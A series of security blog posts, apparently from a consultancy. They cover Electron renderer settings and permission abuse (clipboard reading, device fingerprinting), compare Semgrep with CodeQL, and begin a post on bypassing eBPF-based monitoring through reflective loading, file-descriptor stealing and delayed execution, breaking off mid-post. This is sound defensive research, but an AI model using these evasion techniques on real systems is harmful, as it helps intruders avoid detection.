    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives while the second one to be isolated. This is not always the case and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

Affinity Diff By Versions

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

  • The specific Electron in use determines which webPreferences are applicable and which aren’t
  • The semantic and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual person. If you’re a consultant, you can run ElectroNg for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development focus will be towards features that are important for the paid customers with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity since bug fixes and features that are applicable to the OSS version will be also ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps seemingly handling microphone & video permissions separately, are only tracking and respecting the user choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented but writing to files has not been implemented and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Cliboard Reading Callback
Cliboard Reading Callback

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

Comparing Semgrep and CodeQL

5 October 2022 at 22:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because ultimately, we all hope ideally that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design. For example, systems administration applications which executes shell commands, via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are then left with the subjective question of whether to classify a finding as a true or false positive where an application’s users can execute arbitrary code in an application, that they’d need to be fully and properly authenticated and authorized to do.

These types of issues come from asking too much of the SAST application and we should focus on locating vulnerable code patterns - leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, findings on certain paths, or conditionally ignoring things, becomes very important to filter the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is a better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up when you’re in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be if a tool missed a vulnerability that was due to a parsing error, that would certainly be fixed in a later release, rather than a rules matching issue specifically.

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) require prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source and unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number or sources that lead to a protected sink, the total of protected sinks, the total safe function calls (regardless if they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Semgrep VS CodeQL

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

  • Language and framework support
  • Lexer/Parser functionality
  • Pre/post scan options (exclusions, disabling checks, filtering, etc.)
  • Rules
  • Findings workflows (internal tracking, ticket system integration, etc.)
  • Scan times

Language and framework support

The images below outline the supported languages for each tool, refer to the source links for additional information about the supported frameworks:

Semgrep:
Semgrep results

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:
CodeQL results

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but a larger number, both in GA and under development in Semgrep. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code where a custom function (exit()) was declared and used, despite being reserved, causing the parser to fail once the function was reached, due to invalid syntax. The two notable things here are that the code should theoretically not work properly and that despite this, Semgrep was still able to perform a partial examination. Semgrep excelled in terms of the ability to handle incomplete code or code with errors as it operates on a single file scope generally.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

  • Choosing which rules, or groups of rules, to run, or allowing automatic selection
    • Semgrep registry rules (remote community and r2c created; currently 973 rules)
    • Local custom rules and/or “ephemeral” rules passed as an argument on the command line
    • A combination of the above
  • Choosing which languages to examine
  • A robust set of filtering options to include/exclude files, directories and specific content
  • Ability to configure a comparison baseline (find things not already in commit X)
  • Whether to continue if errors or vulnerabilities are encountered
  • Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
  • The maximum size of the files to scan
  • Output formats

Notes:

  1. While the tool does provide an automated scanning option, we found situations in which -–config auto did not find all the vulnerabilities that manually selecting the language did.

  2. The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

  • Specifying which language(s) to process
    • The CodeQL repository contains libraries and specific queries for each language
    • The Security folder contains (21) queries for various CWEs
  • Which queries to run
  • Location of the files
  • When the queries are run on the resulting database you can specify the output format
  • Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*

The logic in the rules is familiar and amounts to what feels like stacking of RegExs, but with the added capability of creating boundaries around what is matched against and with the benefit of language comprehension. It is important to note however that Semgrep lacks a full understanding of the code flow sufficient enough to trace source to sink flows through complex code. By default it works on a single file basis, but Beta features also include the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool, with abstract syntax trees and control flow graphs.

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

  • Logical: all the operations in QL are logical operations.
  • Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
  • Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
  • Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one at a time. Trying to specify a list of target languages (go, javascript and c) didn’t work out of the box because CodeQL required to explicitly set the build command for this combination of languages.

CodeQL can also be used in VSCode as an extension, a CLI tool or integrated with Github workflows. The VS extension code allows writing the queries with the support of the autocompletion by the IDE and testing them against one or more databases previously created.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // all the functions call where the argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Uses a constant time comparison for sensitive information"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user should know the CodeQL syntax very well and pay attention to the structure of the condition to avoid killing the performance. We experienced an infinite compilation time just adding an OR condition in the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are perceivable only in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to setup, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

  • Scanning in a CI/CD pipeline - speed matters more
  • Ongoing periodic scans - speed matters less
  • Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.

Semgrep OWASP Benchmark Project results
CodeQL OWASP Benchmark Project results

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While initially seeming like a great way to compare the tools, unfortunately, the test case files presented several challenges to this approach. While being labeled things like “Good” and “Bad” either in file names or comments, the files were not necessarily all “Good” code or “Bad” code, but inconsistently mixed, inconsistently labeled and sometimes with multiple potential vulnerabilities in the same files. Additionally, we occasionally discovered vulnerabilities in some of the files which were not the CWE classes that were supposed to be in the files (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regards to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Semgrep/CodeQL cross-tool results

Notes:

  1. Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.

  2. Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319

  3. Semgrep’s results only included two vulnerabilities which were the one intended to be found in the file (e.g., test for X find X). The remainder were HTTPs issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X but find valid Y instead).

  4. CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.

  5. Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.

  6. False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities and are therefore considered TNs and likewise that there are no FNs. This underscores that testing against code that has already been organized for evaluation can be assumed as more accurate.

Running Semgrep with the “r2c-security-audit” configuration, resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to only count it as one finding per file, as to not further skew the results, by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

Semgrep OWASP Benchmark Project results
  1. For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.

  2. Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this, to underscore that results will vary greatly depending on the code tested and rules applied. That reduction in scope resulted in no false positives during manually reviewed results.

  3. For CodeQL, approximately 25% of the files were not scanned, due to issues with the tool

  4. CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to result in significantly less findings than expected.

Conclusion

Obviously there could be some bias, but if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in this section : “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a security consultancy boutique doing high-quality manual audits. This is because we don’t always have access to all the source code that we’d need to use CodeQL, the process of setting up scans is more laborious and time consuming in CodeQL. Additionally, we can manually vet findings ourselves - so a few extra findings isn’t a major issue for us and we can use it for free. If an organization’s use-case is more aligned with our client’s - being an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g. running a scan during CI/CD) and doesn’t mind paying for the licensing, CodeQL might be a better choice for them.

On Bypassing eBPF Security Monitoring

10 October 2022 at 22:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. Such a paradigm shift in the latest monitoring technologies is being driven by a variety of reasons. Some of them are motivated by performance needs in an increasingly cloud-dominated world, among others. The Linux kernel always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBFP-based programs are used for DDoS mitigations, intrusion detection, container security, and general observability.

In 2021 Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All issues reported have been promptly fixed, mitigated or documented as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets while attempting to bypass any security monitoring solution based on eBPF:

A few words on how eBPF works


eBPF schema

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical — eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of research in the past focused on local privilege exploitations (LPE), which we won’t cover in this blog post. After the program is loaded, the user mode application attaches the program to a hook point that will trigger the execution when a certain hook point (event) is hit (occurs). The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF due to performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs executions vs filesystem operations), there could be areas where excessive probing could lead to a performance overhead pushing the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily constitute something that the Linux kernel must have a monopoly over, unlike filesystem access, or any number of other things. Because of this, the execve() system call can be mimicked in userland with a minimal difficulty. Creating a new process image is therefore a simple matter of:

  • cleaning out the address space;
  • checking for, and loading, the dynamic linker;
  • loading the binary;
  • initializing the stack;
  • determining the entry point and
  • transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has nowadays been pioneered and streamlined by OTS post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since this custom userland exec would effectively replace the existing process image within the current address space with a new one. In this, userland exec mimics the behavior of the system call execve(). However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.

1.2 Network bypasses

Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

  • OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
  • OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
  • OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
  • OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
  • OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.

In case the same local user has mixed monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020 some versions of Linux kernels had introduced a new system call to achieve this called pidfd_getfd. A small number of operating systems (like Ubuntu) implement the Yama kernel module that limit file descriptor access to only child-parent processes. A PoC code for using this function is available on Github (TheZ3ro/fdstealer).

File descriptor stealing using pidfd_getfd

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.

3. Evade scoped event monitoring based on cgroup

